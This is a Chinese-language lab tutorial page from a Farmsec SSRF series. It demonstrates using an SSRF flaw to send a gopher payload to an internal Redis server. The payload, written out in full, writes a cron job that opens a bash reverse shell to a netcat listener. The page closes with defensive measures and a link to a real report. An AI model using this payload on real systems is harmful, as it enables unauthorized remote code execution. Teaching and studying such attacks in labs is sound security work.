网络安全检测|网络安全服务|网络安全扫描-香港墨客投资移动版

主页 > 业界资讯 > 网络渗透测试

ssrf漏洞(上) · Farmsec Open Source(6)

须先清除测试机(192.168.11.192)反弹shell计划任务,避免对如下测试造成影响

crontab -e crontab -l

image-20220408112028898

7.4.13 退出测试nc监听,重新开启nc监听任务 nc -lvp 3333

image-20220408112310944

7.4.14 开始攻击

使用ssrf漏洞将gopher攻击语句传递到内网redis主机

?url=gopher%3A%2F%2F192.168.11.203%3A6379%2F_*1%250d%250a%248%250d%250aflushall%250d%250a*3%250d%250a%243%250d%250aset%250d%250a%247%250d%250afarmsec%250d%250a%2459%250d%250a%250a%250a*%2F1%20*%20*%20*%20*%20bash%20-i%20%3E%26%2Fdev%2Ftcp%2F192.168.10.96%2F3333%200%3E%261%250a%250a%250a%250d%250a*4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2Fvar%2Fspool%2Fcron%2F%250d%250a*4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a*1%250d%250a%244%250d%250asave%250d%250a%250a

image-20220408113120957

7.4.15 nc监听到反弹的shell

image-20220408113013899

8 防御 禁用不需要的协议(如:file:///、gopher://,dict://等),仅仅允许http和https请求 统一错误信息,防止根据错误信息判断端口状态 禁止302跳转,或每次跳转,都检查新的Host是否是内网IP,直到抵达最后的网址 设置URL白名单或者限制内网IP 9 思考

ssrf与文件包含的相似处与不同处?

10 真实案例

https://hackerone.com/reports/115748

Copyright © fsec.io 2022 all right reserved,powered by farmsec该文件修订时间: 2022-04-12 15:50:23

(责任编辑:admin)